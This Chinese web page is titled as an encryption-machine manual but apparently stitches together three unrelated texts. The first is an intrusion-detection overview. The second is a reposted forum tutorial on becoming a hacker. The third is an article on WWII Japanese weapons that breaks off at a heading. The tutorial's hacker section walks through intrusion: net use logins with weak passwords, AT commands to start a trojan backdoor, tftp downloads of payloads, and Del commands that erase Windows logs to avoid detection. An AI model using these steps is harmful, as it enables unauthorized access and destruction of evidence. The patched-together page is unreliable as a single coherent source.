加密機操作手冊

A. 簡述入侵檢測常用的四種方法

入侵檢測系統所採用的技術可分為特徵檢測與異常檢測兩種。

1、特徵檢測

特徵檢測(Signature-based detection) 又稱Misuse detection ，這一檢測假設入侵者活動可以用一種模式來表示，系統的目標是檢測主體活動是否符合這些模式。

它可以將已有的入侵方法檢查出來，但對新的入侵方法無能為力。其難點在於如何設計模式既能夠表達「入侵」現象又不會將正常的活動包含進來。

2、異常檢測

異常檢測(Anomaly detection) 的假設是入侵者活動異常於正常主體的活動。根據這一理念建立主體正常活動的「活動簡檔」，將當前主體的活動狀況與「活動簡檔」相比較，當違反其統計規律時，認為該活動可能是「入侵」行為。

異常檢測的難題在於如何建立「活動簡檔」以及如何設計統計演算法，從而不把正常的操作作為「入侵」或忽略真正的「入侵」行為。

(1)加密機操作手冊擴展閱讀

入侵分類：

1、基於主機

一般主要使用操作系統的審計、跟蹤日誌作為數據源，某些也會主動與主機系統進行交互以獲得不存在於系統日誌中的信息以檢測入侵。

這種類型的檢測系統不需要額外的硬體．對網路流量不敏感，效率高，能准確定位入侵並及時進行反應，但是佔用主機資源，依賴於主機的可靠性，所能檢測的攻擊類型受限。不能檢測網路攻擊。

2、基於網路

通過被動地監聽網路上傳輸的原始流量，對獲取的網路數據進行處理，從中提取有用的信息，再通過與已知攻擊特徵相匹配或與正常網路行為原型相比較來識別攻擊事件。

此類檢測系統不依賴操作系統作為檢測資源，可應用於不同的操作系統平台；配置簡單，不需要任何特殊的審計和登錄機制；可檢測協議攻擊、特定環境的攻擊等多種攻擊。

但它只能監視經過本網段的活動，無法得到主機系統的實時狀態，精確度較差。大部分入侵檢測工具都是基於網路的入侵檢測系統。

3、分布式

這種入侵檢測系統一般為分布式結構，由多個部件組成，在關鍵主機上採用主機入侵檢測，在網路關鍵節點上採用網路入侵檢測，同時分析來自主機系統的審計日誌和來自網路的數據流，判斷被保護系統是否受到攻擊。

B. 初學電腦—— 高手

黑客是怎樣煉成的
編者：關於黑客是怎樣煉成的，網上有了n個版本了。不過多數是嘩眾取寵。
看看這個吧，是我在網上所能看到的最詳細的教程了．相信對你一定會有好處的。

基礎：
如何去學習
·要有學習目標
·要有學習計劃
·要有正確的心態
·有很強的自學能力

學習目標
·1.明確自己的發展方向(你現在或者將來要做什麼,程序員?安全專家?網路黑客等)
·2.自己目前的水平和能力有多高
·能簡單操作windows2000
·能簡單配置windows2000的一些服務
·能熟練的配置Windows2000的各種服務
·能熟練配置win2000和各種網路設備聯網
·能簡單操作linux,Unix,Hp-unix, Solaris中的一種或者多種操作系統
·能配置cicso,huawei,3com,朗迅等網路設備
·會簡單編寫C/C++,Delphi,Java,PB,VB,Perl
·能簡單編寫Asp,Php,Cgi和script,shell腳本

·3.必須學會不相信態度,尊重各種各樣的能力
·不要為那些裝模做樣的人浪費時間
·尊重別人的能力,
·會享受提高自己能力的樂趣.
·在知道了自己的水平和能力之後就要開始自己的目標了
·--------安全專家
·--------黑客
·--------高級程序員
·黑客是建設網路,不是破壞網路, 破壞者是駭客;
·黑客有入侵的技術,但是他們是維護網路的,所以和安全專家是差不多的;
·因為懂得如何入侵才知道如何維護
·因為懂得如何維護才更要了解如何入侵
·這是 黑客與安全專家的聯系
·但,他們都是在會編程的基礎上成長的!
·下面我們開始我們的學習計劃!

學習計劃
有了學習計劃才能更有效的學習

安全學習計劃
不奢求對win98有多麼精通,我們也不講解win98如何應用,如何精通,我們的起步是win2000 s
erver,這是我們培訓的最低標准,你對英語有一定的了解也是必不可少

最基礎
·a.會裝win2000,知道在安裝的時候有兩種分區格式,NTFS與FAT32 及他們的區別,知道win2
000可以在安裝的時候分區,格式化硬碟, 可以定製安裝,可以定製自己需要安裝的一些組件
,如果有網路適配器,可以直接加入域中 學習點:NTFS和FAT32分區的不同 各個組件的作用
域的定義
·b.知道如何開,關機 知道注銷的用處
·c.知道win2000下面各主要目錄的作用 Documents and Settings,WINNT,system32 Progra
m Files
·d.知道管理工具裡面各個組件的定義
·e.學會應用命令提示符cmd(dos)
·f.知道計算機管理裡面的各個選項的不通
·g.知道win2000強大的網路管理功能
·h.能非常熟練的操作win2000
·i.知道IP地址,子網掩碼,網關和MAC的區別

進階
·A.配置IIS,知道各個選項的作用
·B.配置DNS,DHCP
·C.配置主控制域,輔助域
·D.配置DFS
·E.配置路由和遠程訪問

·F.配置安全策略IPSEC
·G.配置service(服務)
·H.配置磁碟管理,磁碟分額
·i. 配置RAID(0,1,0+1,5)
·J.路由器的安裝與簡單配置
·K.交換機的安裝與簡單配置
·L.常見的VPN,VLAN,NAT配置
·M.配置常見的企業級防火牆
·N.配置常見的企業級防病毒軟體

高級
·之前我們學到的是任何一個想成為網路安全專家和黑客基本知識中的一部分
·你作到了嗎??
·如果你做到了,足以找到一份很不錯的工作!

配置負載均衡
·配置WIN2000+IIS+EXCHANGE+MSSQL+SERVER-U+負載均衡+ASP(PHP.CGI)+CHECK PIONT(ISA
SERVER) ·
·配置三層交換網路 ·
·配置各種復雜的網路環境
·能策劃一個非常完整的網路方案 ·
·能獨自組建一個大型的企業級網路 ·

·能迅速解決網路中出現的各種疑難問題

結束
·在你上面的都學好了,你已經是一個高級人才了,也是我們VIP培訓的目標!
·可以找到一份非常好的工作
·不會再因為給女朋友買不起玫瑰而發愁了!

安全：
導讀
·系統安全服務(SYSTEM)
·防火牆系統(FIREWALL)
·入侵檢測(IDS)
·身份驗證(CA)
·網站監控和恢復(WEBSITE)
·安全電子商務(E-BUSINESS)
·安全電子郵件(E-MAIL)
·安全辦公自動化(OA)
·Internet訪問和監控(A&C)
·病毒防範(VIRUS)
·虛擬區域網(VPN)

系統安全服務

·系統安全管理
·系統安全評估
·系統安全加固
·系統安全維護
·安全技能學習

系統安全管理
·信息系統安全策略
·信息系統管理員安全手冊
·信息系統用戶安全手冊
·緊急事件處理流程

系統安全評估
1、系統整體安全分析
· 分析用戶的網路拓撲結構，以找出其結構性及網路 配置上存在的安全隱患。
· 通過考察用戶信息設備的放置場地，以使得設備物理上是安全的。
· 分析用戶信息系統的管理、使用流程，以使得系統 能夠安全地管理、安全地使用
2、主機系統安全檢測
· 通過對主機進行安全掃描，以發現系統的常見的安全漏洞。
· 對於特定的系統，採用特別的工具進行安全掃描。
· 根據經驗，對系統存在的漏洞進行綜合分析。
· 給出系統安全漏洞報告。

· 指出各個安全漏洞產生的原因以及會造成的危險。
· 給出修復安全漏洞的建議
3、網路設備安全檢測
· 通過對網路進行安全掃描，以發現網路設備的安全漏洞。
· 根據經驗，對網路設備存在的漏洞進行綜合析。
· 給出網路設備安全漏洞報告。
· 指出各個安全漏洞產生的原因以及會造成的險。
· 給出修復安全漏洞的建議。

安全系統加固
·為用戶系統打最新安全補丁程序。
·為用戶修復系統、網路中的安全漏洞。
·為用戶去掉不必要的服務和應用系統。
·為用戶系統設置用戶許可權訪問策略。
·為用戶系統設置文件和目錄訪問策略。
·針對用戶系統應用進行相應的安全處理。

安全系統維護
·防火牆系統維護，安全日誌分析
·IDS系統維護，安全日誌分析
·VPN系統維護，安全日誌分析
·認證系統維護，安全日誌分析

·伺服器、主機系統，安全日誌分析
·其它各類安全設施維護及日誌分析

安全技能培訓
·網路安全基礎知識
·網路攻擊手段演示和防範措施
·防火牆的原理和使用
·VPN的原理和使用
·漏洞掃描工具的原理和使用
·IDS（入侵檢測系統）的原理和使用
·身份認證系統的原理和使用
·防病毒產品的原理和使用
·系統管理員安全培訓
·一般用戶安全培訓

防火牆系統
·防火牆的定義
·防火牆的分類
·包過濾防火牆
·應用網關防火牆
·狀態檢測防火牆
·一般企業防火牆配置

·政府機構防火牆配置
·涉密網路保密網關配置
·高可用性和負載均衡防火牆系統
·高速防火牆系統

防火牆的定義
·用以連接不同信任級別網路的設備。
·用來根據制定的安全規則對網路間的通信進行控制

防火牆的分類
·包過濾 (Packet Filters)
·應用網關 (Application Gateways)
·狀態檢測(Stateful Inspection)

包過濾防火牆
·包 過 濾 技 術
·主要在路由器上實現，根據用戶定義的內容（如IP地址、埠號）進行過濾。包過濾在網
絡層進行包檢查與應用無關。
· 優 點
· 具有良好的性能和可伸縮性。
· 缺點
· 由於包過濾技術是對應用不敏感的，無法理解特定通訊的含義，因而安全性很差。

應用網關防火牆
·應用網關技術
·第二代防火牆技術，其在應用的檢查方面有了較大的改進,能監測所有應用層，同時對應
用「內容」（Content Information）的含義引入到了防火牆策略的決策處理。
· 優點
· 安全性比較高。
· 缺點
· 1、該方法對每一個請求都必須建立兩個連接，一個從客戶端到防火牆系統，另一個從
防火牆系統到伺服器，這會嚴重影響性能。
· 2、防火牆網關暴露在攻擊者之中。
· 3、對每一個代理需要有一個獨立的應用進程或 daemon 來處理， 這樣擴展性和支持
新應用方面存在問題。

檢測狀態防火牆
· 屬第三代防火牆技術，克服了以上兩種方法的缺點，引入了OSI全七層監測能力，同時
又能保持 Client/Server的體系結構，也即對用戶訪問是透明的。
· 防火牆能保護、限制其他用戶對防火牆網關本身的訪問。
· 狀態檢測技術在網路層截獲數據包後交給INSPECT Engine,通過 INSPECT Engine 可以
從數據包中抽取安全決策所需的所有源於應用層中的狀態相關信息，並在動態狀態表中 維
持這些信息以提供後繼連接的可能性預測。該方法能提供高安全性、高性能和擴展性、高伸
縮性的解決方案。

入侵檢測系統
·處理攻擊時遇到的典型問題
·解決入侵的方法和手段
·基於網路的入侵檢測
·基於主機的入侵檢測
·入侵檢測系統典型配置

處理攻擊時遇到的問題
·獲得的信息不足
·不知到網路上發生了什麼事。
·無法判定系統是否已經被入侵。
·信息不準確
·人員少
·沒有足夠的人員維護管理。
·缺乏規范的處理程序
·發現攻擊時如何反應?
·下一步該如何處理?

解決入侵的方法和手段
·採用入侵實時入侵監控系統（IDS）
·對系統、網路中發生的事件進行實時監控。

·當發生入侵事件時能即時反應。
·對入侵事件進行詳細記錄並跟蹤。

基於主機的入侵檢測
·軟體模塊安裝在包含有重要數據的主機上
·監視操作系統的日誌以發現攻擊的特徵。
·監視代理所處主機上的所有進程和用戶.
·監視暴力登錄攻擊（brute-force login）, 試圖改變或繞過安全設定，及特權的濫用等
。
·當新的日誌產生時，為了減小對CPU的影響，代理程序暫時中斷。

基於網路的入侵檢測
·軟體安裝在專門的主機上，放置於關鍵的網段
·將配置該軟體主機的網卡設置為混雜模式，使得該主機能接受網段上所有的包。
·分析數據包以判斷是否有黑客攻擊。
·監視網段上的所有數據。
·對網路的流量無任何影響。
·能檢測到 denial of service attacks, unauthorized access attempts, pre-attack s
cans等攻擊。

身份認證系統
·用戶身份認證的方法

·不同認證方法的安全級別
·用戶身份認證的常用方式
·解決問題的方法
·目前比較成熟的雙因素認證方法

用戶身份驗證
·你知道的一些東西
· 密碼, 身份證號，生日
·你有的一些東西
· 磁卡, 智能卡,令牌, 鑰匙
·你獨有的一些東西
· 指紋,聲音，視網膜

密碼是不安全的
·可以破解密碼的工具太多
·大多密碼在網路中是明文傳輸的
·密碼可以網路離線時被窺測
·密碼和文件從PC和伺服器上被轉移了
·好記的密碼容易被猜到,不易猜測的密碼又太難記

解決方法
·使用混合的工具:如IC卡+PIN

網站監控與恢復系統
·典型的Web伺服器應用
·Web伺服器存在的安全問題
·網站安全解決方法

典型web伺服器應用
·Internet-->路由器-->防火牆-->web站點
· |
· |
· 內部網
·所有的放在防火牆後面

Web伺服器存在的安全問題
· 網頁被非法篡改是網站內容提供者最頭痛的問題。在採用防火牆後，Web伺服器本身的漏
洞成為了網站被黑的主要問題。
· Web應用伺服器(如IIS,Apache中存在著大量的安 全漏洞.)
· 用戶自己開發的CGI、ASP、PHP應用中存在著大量潛在的漏洞。

網站安全
·採用Web伺服器監控與恢復系統

·該系統提供對網站文件內容的實時監控，發現被改動後立即報警並自動恢復。

電子商務安全系統
·典型的電子商務應用
·電子商務中存在的安全問題
·電子商務的安全解決方法
·實時數據交換系統

典型電子商務應用
·Internet--->防火牆--->Web伺服器
· || |
· || |
· 內部網(資料庫)

電子商務中存在的安全問題
·1、Web伺服器端
·Web應用伺服器（如IIS、Apache中存在著大量的安全漏洞。用戶自己開發的CGI、ASP、PH
P應用中存在著潛在的漏洞。
· 黑客通過這些漏洞攻擊Web伺服器，可非法篡改網頁，造成惡劣影響，動搖了電子商務使
用者的信心。
· 甚至可獲得Web伺服器上大量的敏感資料，如用戶的信用卡號，用以連接內部資料庫的帳
號和口令。

· 可能通過控制Web伺服器，來攻擊內部資料庫。

電子商務中存在的安全問題
·2、SSL協議
·SSL加密強度低。由於瀏覽器默認的加密模塊只支持40位的低強度加密，而且即使在瀏覽
器中安裝更高位的加密模塊，由於WEB伺服器不提供對高位SSL鏈接的支持同樣無法實現高強
度SSL加密鏈接。
· 無法解決電子商務中的用戶簽名。SSL鏈接建立WEB伺服器和用戶瀏覽器之間的安全通道
只能保證在安全通道內的信息不被竊聽或篡改，並不能對用戶發送的信息進行簽名以保證信
息的有效性和不可抵賴性，而這正是電子商務中必須解決的問題。

電子商務的安全解決方法
·將WEB伺服器分為兩部分：一般內容的WEB伺服器和交易WEB伺服器。
· 一般內容的WEB伺服器放置在DMZ區內，採用WEB站點監控和恢復系統保護，防止主頁被非
法改動。
· 交易WEB伺服器放置在內部網內，通過一台物理分隔的實時數據交換系統將其與DMZ區相
連。
· 在客戶機和伺服器端安裝SSL代理，從而獲得128位的高強度加密通道

實時數據交換系統
·將系統外部 Web伺服器和內部應用Web伺服器物理隔開.
·外部Web伺服器用於存放一般的信息，內部Web服 務器用於存放敏感信息，並和內部數據

庫連接。
·外部用戶通過http訪問位於DMZ區內的一般Web伺服器。
·當進行交易時，用戶需訪問位於內部網內的應用伺服器。
·https連接首先到達實時數據交換系統的虛擬外部Web伺服器，實時數據交換系統將https
協議解開，只將https連接的數據內容拷貝到虛擬內部Web伺服器，虛擬內部Web伺服器將使
用該數據重新發起https連接到實際的內部應用Web伺服器.
·內外通過實時數據交換系統進行數據交換，無任何協議和連接穿過實時數據交換系統。
·即使DMZ區的Web伺服器受到攻擊, 攻擊者也的不到任何有用的信息

安全電子郵件系統
·電子郵件的安全問題
·安全電子郵件的解決方法
·一個安全郵件的使用過程

電子郵件的安全問題
·如何保證發送的敏感信息不被泄漏
·如何保證發送的信息不被篡改
·如何確認發件人的真實身份
·如何防止發件人的抵賴行為

安全電子郵件的解決方法
·將PKI體系應用到郵件系統中

·郵件的加密和解密以實現數據的保密。
·郵件的數字簽名（鑒別）實現發件人認證和不可抵賴。
·完整性校驗功能防止信息傳輸過程中被篡改可靠的安全性。
·採用公開密鑰和對稱密鑰相結合的密鑰體系。
·支持128bit對稱密鑰演算法和1024bit公開密鑰演算法。本帖地址為：http://www.nohack.cn/bbs/thread-4689-1-1.html
點擊這里復制此帖網址

是水何必裝純、是人何必稱神！

UID409 帖子541 精華0 積分576 手冊幣70 閱讀許可權50 性別男 在線時間68 小時 注冊時間2005-10-16 最後登錄2007-11-11 查看詳細資料
引用 使用道具 報告 回復 TOP
收藏此頁到：

兜兜裏囿糖
Safety少尉

個人空間 發短消息 加為好友 當前離線 2# 大 中 小 發表於 2006-4-17 13:12 只看該作者
辦公自動化系統的安全問題
· 如何保證發送的敏感信息不被泄漏
· 如何保證發送的信息不被篡改
· 如何確認發件人的真實身份
· 如何防止發件人的抵賴行為

安全辦公自動化系統的解決方法
·將PKI體系應用到辦公自動化系統中
·工作流信息的加密和解密以實現數據保密
·工作流信息的數字簽名（鑒別）實現發件人認證和不可抵賴。
·完整性校驗功能防止信息傳輸過程中被篡改可靠的安全性。
·採用公開密鑰和對稱密鑰相結合的密鑰體系
·支持128bit對稱密鑰演算法和1024bit公開密鑰演算法。

Internet訪問及控制系統
·Internet使用存在的問題

·Internet使用的解決方法
·內容緩存系統
·Internet站點過濾系統

Internet訪問存在的問題
·Internet接入帶寬不足，訪問比較慢。
·大量的用戶訪問相同的內容，造成帶寬的進一步擁擠。
·在上班時間里大量的Internet訪問是與業務無關的。
·有人使用公司的Internet系統訪問色情網站。
·有人使用公司的Internet系統訪問反動站點。
·管理人員無法知道Internet系統的使用情況。

Internet訪問的解決方法
· 對於問題一，採用內容緩存系統。
· 對於問題二，採用Internet 站點過濾系統。

內容緩存系統
·1、Client 發起http連接請求
·2、Proxy 收到請求後將檢查內部緩存內是否有所需內容，若有，則返還給Client。
·3、若無，則Proxy根據請求向目的伺服器發起請求。
·4、Web伺服器將內容返回到Proxy伺服器。
·5、Proxy伺服器將得到的內容發回給Client，並在自己的緩存中保存一份。

Internet站點過濾系統 (一)
·1、Client 發起http連接請求
·2、連接到達防火牆時防火牆將URL送到WebSense Server 檢查。
·3、WebSense 將審查結果返回到防火牆。
·4、防火牆根據其策略決定是否讓該連接通過。
Internet站點過濾系統 (二)
·1、Client 發起http連接請求
·2、Proxy 受到請求後將URL送到WebSense Server檢查。
·3、Proxy根據返回的結果決定是否接收該連接請求。

病毒防範系統
· 互連網時代對防病毒系統的要求
· 計算機病毒解決方法
· 典型病毒防範系統部署

互聯網時代對防病毒系統的要求
· 由於計算機的聯網使用，使得病毒傳播的途徑大為增多：網路文件共享、電子郵件、Int
ernet文件下載，傳播速度也大為加快。
· 新病毒的出現速度加快，用戶的防病毒軟體的病毒特徵碼沒能及時更新。
· 目前已出現了惡意的Java、ActiveX，當使用者瀏覽到包含這些代碼的網頁時，會造成安
全問題。

· 一些來歷不明的電子郵件程序或下載的程序中帶有特洛依木馬，可能會造成受害者的主
機被他人控制。

計算機病毒解決方法
· 從系統的觀點考慮病毒的防範，在所有病毒傳輸的途徑上均配置防病毒軟體，如客戶端
（Win98、 · Win2000)、文件伺服器（NT、Netware）、郵件伺服器（Exchange、Lotus
Notes）、Internet接入系統（Proxy、Firewall)等。
· 整個病毒防範系統採用集中管理的方式，病毒特徵碼統一更新，安全策略集中設定，從
而使得整個網路系統的病毒特徵碼得到快速更新。
· 通過在客戶端的瀏覽器和Proxy、Firewall中嵌入病毒檢查軟體，來防範下在程序中帶有
的病毒和可能的惡意Java、ActiveX等可執行代碼的攻擊。

VPN（虛擬私有網）
· 數據加密分類
· 物理線路加密
· 數據鏈路加密
· 網路層加密—IPSec
· 傳輸層加密—SSL

數據加密類型
·物理層->物理層 物理線路加密
·數據鏈路層->數據鏈路層 (路由器訪問)

·在數據鏈路層(如PPP）進行加密 L2TP、PPTP、L2F
·網路層->網路層(路由器 防火牆 主機)
·在網路層 （如IP）進行加密 IPSec
·傳輸層->傳輸層 (對TCP進行加密 SSL)
·應用層->應用層(在應用層 (如TCP）進行加密 S/MIME、SET、SSH)

物理線路加密
· DDN 加密機
· 幀中繼加密機
· 非同步撥號Modem
· ISDN線路密碼機
· ATM加密機

注:傳輸層加密
·Secure Sockets Layer (SSL) 是一個端到端的Internet 安全協議，通過採用數字證書，
它提供了數據加密、身份認證的功能。SSL建立在傳輸層，它為客戶機和伺服器在應用級建
立起一個端到斷的安全會話。
·SSL代理—128位的高強度加密模塊

結束語·恭喜你:
·學完這些並且可以熟練應用,已經是一個真正的網路安全專家了!
·希望此時的你旁邊有個溫柔稍有點調皮的女朋友,為這孤獨而寂寞的網路添加一點跳動的

色彩!

黑客編：
必須要掌握的幾個命令
·Net
·netsh
·Ftp
·hostname
·Telenet(nc)
·tracert
·At
·Tftp
·Netstat
·Regedit
·Ping

必須要掌握的幾個協議
·http
·dns
·ftp
·Pop
·Smtp

·Icmp
·Udp
·tcp

開始
·掌握了黑客攻擊的方式和手段後,那麼學習黑客就簡單多了!
·因為你掌握了這些,剩餘的就是使用工具入侵
·熟悉掌握一套自己用的黑客工具

高級
·自己編寫專用的黑客工具
·自己發現系統漏洞

黑客入侵手段
·收集信息:
· 收集要入侵的目標信息
· IP,域名,埠,漏洞,位置

弱口令
·在nt\2000\xp\2003中弱口令可以用
·Net use \ip 「password」 /user:user
·如果目標機開3389服務,可以直接連接

·在sql的sa弱口令,可以用sql連接器直接 ·登陸

後門木馬
·如果有ipc$共享,可以過去木馬後門
·用at啟動
·AT \ip time /INTERACTIVE
·如果可以得到shell,也可以用tftp
·Tftp.exe –i ip get *.* *.*
·然後直接安裝 ·如果有3389,可以自己建一個iis,下載 直接運行

密碼破解
·遠程破解mysql,mssql,ftp,mail,共享密碼
·本地破解管理員(administrator)密碼

緩沖溢出
·可以用緩沖溢出攻擊,
·比如流行的webdev,rdcom模塊漏洞
·可以直接得到system管理許可權
·緩沖溢出後的一般現象是:
·Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>

Web服務漏洞
·例如:
·Unicode漏洞遍歷磁碟和執行程序
·二次編碼漏洞遍歷磁碟和執行程序
·.HTR漏洞查看源代碼

嗅探監聽
·例如:
·針對web監聽
·針對mail監聽
·工具如:sinffer , iris

欺騙攻擊
·例如:
·運用arp欺騙攻擊

偽裝欺騙
·常見的如:mail病毒
·把一個文件改名字甚至圖標,欺騙對方執行

社會工程學

·例如:
·QQ聊天誘惑
·EMAIL信息
·電話
·誘惑

拒絕服務
·例如:
·Dos攻擊
·Ddos攻擊

利用跳板
·利用自己的肉雞作為跳板攻擊別的機器
·My PC------>跳板(肉雞)--->目標

路由器漏洞
·如:
·原始密碼
·程序漏洞

防火牆
·利用欺騙攻擊防火牆,導致防火牆功能失效

·利用防火牆的模塊漏洞

unix/linux
·NetWare Linux unix solais Solaris hp-unix Aix 等
·這些目前先不講解

精通黑客工具
·必須有一套自己可以完全掌握的黑客工具
·如埠掃描 Nscan,bluescanport
·監聽工具:sinffer iris
·telnet工具:nc
·掃描工具:sss,nmap, LANguard
·後門工具:radmin,winshell
·密碼破解:lc4
·遠程管理:pcanywhere
·會使用各種經典的黑客工具

清除日誌
·在你入侵機器以後,離開的時候,要完全清除
·自己在那台機器上留下的痕跡
·例如清除
·Del C:\WINNT\system32\LogFiles\*.*

·Del C:\WINNT\system32\*.log
·Del C:\WINNT\system32\*.txt
·Del C:\WINNT\*.log
·Del c:\winnt\*.txt

如果你不清除日誌
·當目標機器的管理員發現你的證據
·完全可以讓你在大牆內渡過一段日子

黑客
·當你完全掌握這些後
·你就成為了一名小黑客

高級
·編寫自己的黑客工具
·發現系統漏洞

高級黑客
·目前你足以成為一個高級黑客了

真正的黑客
·精通各種網路協議

·精通操作系統
·精通編程技術
·精通安全防護
·不搞破壞
·挑戰技術難題

結束
·想學好這些,並不是靠別人給你的,而是靠自己的努力,自己的自學得到的!
·別人只能指導你,怎麼去做,只能告訴方法,
·真正的實施是你自己,經過N*N個日夜努力換來的
·不要一個問題問多次,要多動手,動腦!
·Google裡面有太多的答案,為什麼我搜索不到?因為你的關鍵字用的不對!
·黑客基地是為了培養出一批優秀的網路人才,讓更多想學習網路的愛好者有一個理想的學
習環境
·這三篇幻燈片是我們多年的經驗得到的!
·很有價值,望好好保存!仔細研究!

技術巔峰
·希望我們能在這里相聚!

本篇文章來源於 黑客手冊技術論壇
原文鏈接：http://www.nohack.cn/bbs/thread-4689-1-1.html

C. 二戰時日本那些「腦洞大開」的武器設計，這算是「超前」嗎

1905年，日本卑鄙的擊敗了沙俄帝國海軍，成為世界性強國。

雖然在第一次世界大戰期間與協約國結盟，但日本帝國在凡爾賽遭到冷落後，改變了對其盲目跟隨的態度。

20世紀30年代，日本嘗試與納粹德國結盟，開始了一系列侵略運動，努力在太平洋地區站穩腳跟，不過後來日本的一系列行動最終將美國硬生生的給拖入到戰場上來。

日本也有自知之明，知道自己將要面對的對手的實力有多強悍，不管是在資源、經濟還是在工業實力還是科學技術方面，都無法與其長期抗衡，他們應該做的就是要在短期內，出其不意的將美國徹底擊敗，讓這個龐然大物失去爪牙，為此，日本陸軍加速研製和裝備先進的常規武器、自殺攻擊武器，甚至是生物和化學武器，事實上，日本的戰爭指揮者根本不在乎「日內瓦議定書」上關於禁止使用化學武器的規定，相反，他們認為被禁止的武器是特別有效的，除此之外，日本還加大研發力度，在超前技術和概念武器上下功夫，想以最新式、最先進的武器出其不意的來打擊美國。

在戰爭期間，日本研發了上百件高度概念化的武器，不過很大一部分都未能真正的進入戰場，今天就讓我們看看其中具有代表性的幾款概念裝備或者戰術。

氣球炸彈

當納粹德國向英吉利海峽投擲V2火箭時，日本人也在製造他們自己的「復仇武器」，雖然日本在當時無法研製類似德國那樣的洲際導彈，但是參謀本部卻提出了氣球炸彈的想法。

為了實現這一武器概念，日本人計劃把炸彈裝在氣球上，氣球沿著氣流向美國飛行，大約經過5000英里到達太平洋西北部的森林地區爆炸，並引發大規模的森林火災，這將轉移美國當時稀缺的戰爭資源。

這些氣球是用塑料紙製作的，用澱粉粘在一起，裡面裝滿了氫氣，直徑超過10米，能吊起大約450公斤的物體，氣球上裝備有一枚14公斤重的破片炸彈。

日本人對氣球的飛行軌跡進行了編程，如果氣球上升到1.1萬米以上高空時，就會釋放氫氣，如果氣球下降到1萬米以下，則會拋下裝滿沙子的負載袋，使用機載高度計計量，三個裝滿沙子的負載袋與炸彈一起懸掛在氣球下面，每個負載袋的重量在1到3公斤之間，這些袋子的脫離程序是成對的釋放的，這樣可以保持氣球的平衡，按照日本人的想法，氣球在飛行時由於溫度的變化白天會上升高度，而晚上都會掉下來，直到壓載袋耗盡為止，這時氣球和它攜帶的炸彈就會落在它下面的任何東西上。

聽起來像個笑話，不過第一批氣球還真的於1944年末被釋放了出去，11月5日在加利福尼亞州聖佩德羅附近降落，第二天，他們到達懷俄明州的塞莫波利斯，有些甚至降落在加拿大，根據美國方面的記載總共約有285次經證實的著陸或目擊事件。

1945年3月5日，六名美國人在俄勒岡州試圖將氣球從森林拉回營地時被其中一個氣球上的炸彈殺死。

巨型潛艇

日本人在戰爭期間曾經秘密建造了三艘巨型潛艇，保持著有史以來最大的傳統動力潛艇的記錄，作為日本統治太平洋計劃的一部分，他們被設計用來偷襲和攔截巴拿馬運河上過往的軍艦和船隻。

潛艇配備了三架M6A1型飛機，可攜帶魚雷或者是超過800公斤的炸彈，他們被安置在一個防水的、耐壓的機庫里，飛機是從艇首的彈射器上發射，三架飛機都可以在潛艇浮出水面後的45分鍾內組裝完畢，並完成加油、裝備和發射的全過程。

它甚至還設計了浮潛管，上面覆蓋著一種厚厚的橡膠狀物質，旨在吸收雷達和聲納信號。

自殺式潛水服

這些特殊潛水服是專門為日本特種部隊設計的，目的是抵禦盟軍對日本本土的入侵，這些潛水服上裝備有一枚地雷，裡面裝著15公斤炸葯。

潛水員負重9公斤重的鉛，可以在水下行走多達6個小時，在5-7米的深度，具體使用方法是潛水員行走至敵艦的船體底部，然後引爆身上的炸葯，以此來擊沉敵人軍艦。

目前尚不清楚這套潛水服是否真正被使用過，但有報道稱美國步兵登陸艇和一艘測量船遭到自殺游泳者的襲擊。

「紫色」加密機

德國的Enigma機器可能是第二次世界大戰中最著名的加密設備，但它絕不是唯一的加密裝置，1937年，日本人發明了97打字機，因其在日本2597年時的發明而得名，這款加密設備更出名的是它的美國代號：紫色。

這台機器由兩台打字機和一個帶有25個字元字母交換板的電動轉子系統組成，就像啟發它的Enigma機器一樣，可以手動輸入明文或未加密的信息，不過它最重要的創新是第二台電動打字機，它將加密的信息列印在一張紙上(Enigma以閃爍的燈光形式呈現文本)。因此，只需要一個人就可以操作它，由於日本人每天都在更換密碼，所以密碼破解者無法在信息中找到模式。

MXY-7 OKA 飛機

隨著戰爭的進行，以及日本人對神風自殺式攻擊機的改進，他們開始明確地為此目的研製飛機。橫須賀MXY-7是一種火箭推進飛機，於1944年9月首次亮相，為了製造這台機器，日本人盡可能少地使用重要的原材料，而飛機的結構也非常的簡陋。

戰斗時，由三菱G4M的機身下攜帶著OKA，直到接近攻擊目標時這種飛機才被釋放出去，在接近目標之前，這架飛機盡量以滑翔的方式靠，最後時刻點燃火箭推進器，以高速沖向攻擊目標，玉石俱焚。

這架飛機上裝備了一枚2643磅的炸彈，它的高速使得它幾乎不可能被防空火力攔截，也就是說，與母機一起飛行時，它非常脆弱，但是一旦火箭點火，雖然很難駕駛，但敵人想要攔截也幾乎是不可能的事情，雖然使用起來有一定的限制，但至少有一艘美國驅逐艦被這種武器擊沉。

J8M火箭動力攔截器飛機

如果你認為這看起來像德國的梅塞施密特163科米，你是對的。

J8M1本應是先進的納粹飛機的一個許可證製造的復製品，但德國人無法向日本運送一架實體戰機(一艘載有真正的梅塞施密特163飛機的德國潛艇在前往日本的途中被擊沉)，這就使得日本設計師不得不從飛行操作手冊和有限的技術藍圖中逆向設計這架先進的攻擊飛機。

事實上，考慮到盟軍在歐洲的轟炸行動，日本人渴望建造一架攔截飛機，軍隊指揮者擔心，類似的轟炸在日本展開只是時間問題，由於B-29的飛行高度，大多數日本戰斗機無法到達，因此Me 163被視為解決問題的最佳方法。

盡管沒有一架實體機可供設計參考，但在戰爭結束前，日本人已經測試了一架原型飛機，這就是J8M，1945年7月7日，J8M在控制中心進行了首飛，不過這次飛行是短暫，並且還是災難性的，雖然起飛階段不錯，但在爬升過程中發動機失靈，飛機直接墜毀，試飛飛行員當場死亡，不過日本人不甘心，又建造了六架原型機進行試飛，不過直到戰爭結束也沒有一架順利通過測試。

O-I超重型坦克

日本人通常不太在意自己的坦克，盡管他們確實有一些相當好的坦克，包括97式中型坦克，因為日本的對外戰爭除中國以外，大部分都是海空軍作為主力，陸軍只是充當輔助角色（雖然當時的空軍還歸陸軍指揮），不過到了戰爭後期，他們有了一個雄心勃勃的想法，按照當時的想法如果不是瘋子的話，是不會想出如此「喪心病狂」的設計的，那就是建造超重坦克，我們都知道日本的坦克一直都是一小巧輕便為主，重型坦克幾乎沒有。

而O-I超重型坦克的噸位是絕對巨大的，設計重量100至120噸，駕駛它需要11人共同來完成，這款坦克的有三座炮塔，一門主炮和兩門副炮，一份未經證實的報告稱，其中一輛坦克被派往滿洲，但其真正的戰鬥力不得而知

Ku-go 死亡射線

